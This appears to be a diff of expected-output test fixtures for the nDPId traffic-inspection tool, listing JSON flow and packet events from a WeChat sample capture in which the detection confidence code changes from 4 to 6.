00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1630,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171203806,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1630,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1492171203806,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"thread_ts_msec":1492171203806,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj\/YAAAEC8ZXAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="} -00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1630,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171203806,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
+00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1630,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171203806,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1631,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171205448,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1631,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1492171205448,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492171205448,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} 
-00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1631,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171205448,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1631,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171205448,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1632,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171206877,"flow_last_seen":1492171206877,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171206877,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 
00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1632,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1492171206877,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492171206877,"pkt":"AQBeAAAW0CeIF3AECABGoAAoL+EAAAECUizAqAFk4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} -00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1632,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171206877,"flow_last_seen":1492171206877,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171206877,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1632,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171206877,"flow_last_seen":1492171206877,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171206877,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1633,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1492171208516,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492171208516,"pkt":"AQBeAAAW0CeIF3AECABGoAAoL+IAAAECUivAqAFk4AAAFpQEAAAiAOwDAAAAAQIAAADv\/\/\/6"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1634,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":3,"flow_last_seen":1492171210973,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492171210973,"pkt":"AQBeAAAW0CeIF3AECABGoAAoL+UAAAECUijAqAFk4AAAFpQEAAAiAOwAAAAAAQIAAADv\/\/\/9"} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171211383,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1492171211383,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492171211383,"pkt":"AQBeAAAWACSlnnPpCABGwAAoAABAAAECQeXAqAFs4AAAFpQEAAAiAOwDAAAAAQIAAADv\/\/\/6"} 
-00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1635,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171211383,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1635,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171211383,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1636,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171250302,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1492171250302,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171250302,"pkt":"AQBeAAD7eJKcD6iOCABFAABESuVAAAERi7nAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} -00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1636,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171250302,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} +00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1636,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171250302,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1637,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171250302,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1492171250302,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492171250302,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} -00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1637,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171250302,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1637,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171250302,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1638,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1492171250302,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171250302,"pkt":"AQBeAAD7eJKcD6iOCABFAABESuZAAAERi7jAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1639,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1492171250302,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492171250302,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1640,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1492171251303,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171251303,"pkt":"AQBeAAD7eJKcD6iOCABFAABESy5AAAERi3DAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1641,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":3,"flow_last_seen":1492171251303,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492171251303,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 
01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1492171267294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1492171267294,"pkt":"8IQvSpdgeJKcD6iOCABFAAHsiFZAAEAGSOjAqAFn2DrNg+MfAbtA+v0gFZsbqIAZAT5FiAAAAQEICgA\/pcIy2r7tFwMDAVu+DrsMGADIBc3y\/EPKacgY\/\/yQnIvMDmcJvSRFqPEzGFHK1SfEZD+LW3zHqz7Qn57h7phszvLaMx08coFwWwqfC7HwO5byX8EfZX59ZxB8wie5NmTqPueQB2i63JLDDRRwIsZojgu7bb8cvUD8n10qxsHw\/TQ7hvwnvUlAMmevC0E4bShoN6nD161aFH8pJzOUZ6Inmm16pW110QaYPjjSQQTv7tNyG48jYK3I2RN01WazUewIpPm73LAS9ZABJ\/Ny8oNO\/paZaboPssOjLQcJQCoLWCEO29VIR1wHqlyW4rcdBB9JM36yEvABpD0B99LA+t3vBjUOLhPnYTS5Tg\/Xq\/y13A\/nE4U69mAQajAphd1rkHRmU5H71D9Yn3KgSrb0XGlqT0xKmBjYerOwAP2kk8Whxm\/8laMcKMQksDAjrijAvnUEJ5tIwpNFUcxgRKcVbexJ8LEa9dte0xcDAwAh3EhrcW9cp9\/WX9UiN8Kt\/CmhJWgGaSyh5LdY3zetl0V+FwMDAC1uKRpL0WFRctIQnQp7DT13au9uAW\/kc9Ado7SqH0KYC9BoecHEhGyhydVqz38="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1644,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171175912,"flow_last_seen":1492171267294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":440,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1644,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171175912,"flow_last_seen":1492171267294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":440,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267294,"flow_last_seen":1492171267294,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1492171267294,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171267294,"pkt":"8IQvSpdgeJKcD6iOCABFAABEJBJAAEARkeHAqAFnwKgB\/rE2ADUAMGKHk6IBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267294,"flow_last_seen":1492171267294,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267294,"flow_last_seen":1492171267294,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1649,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267430,"flow_last_seen":1492171267430,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171267430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":59567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1649,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1492171267430,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1492171267430,"pkt":"8IQvSpdgeJKcD6iOCABFAABBJlBAAEARj6bAqAFnwKgB\/uivADUALYbgc9oBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQNsYW4AAAEAAQ=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1649,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267430,"flow_last_seen":1492171267430,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171267430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":59567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ssl.gstatic.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1649,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267430,"flow_last_seen":1492171267430,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171267430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":59567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ssl.gstatic.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268427,"flow_last_seen":1492171268427,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171268427,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1492171268427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1492171268427,"pkt":"8IQvSpdgeJKcD6iOCABFAABBJl5AAEARj5jAqAFnwKgB\/qRaADUALSfRFz8BAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQNsYW4AAAEAAQ=="} 
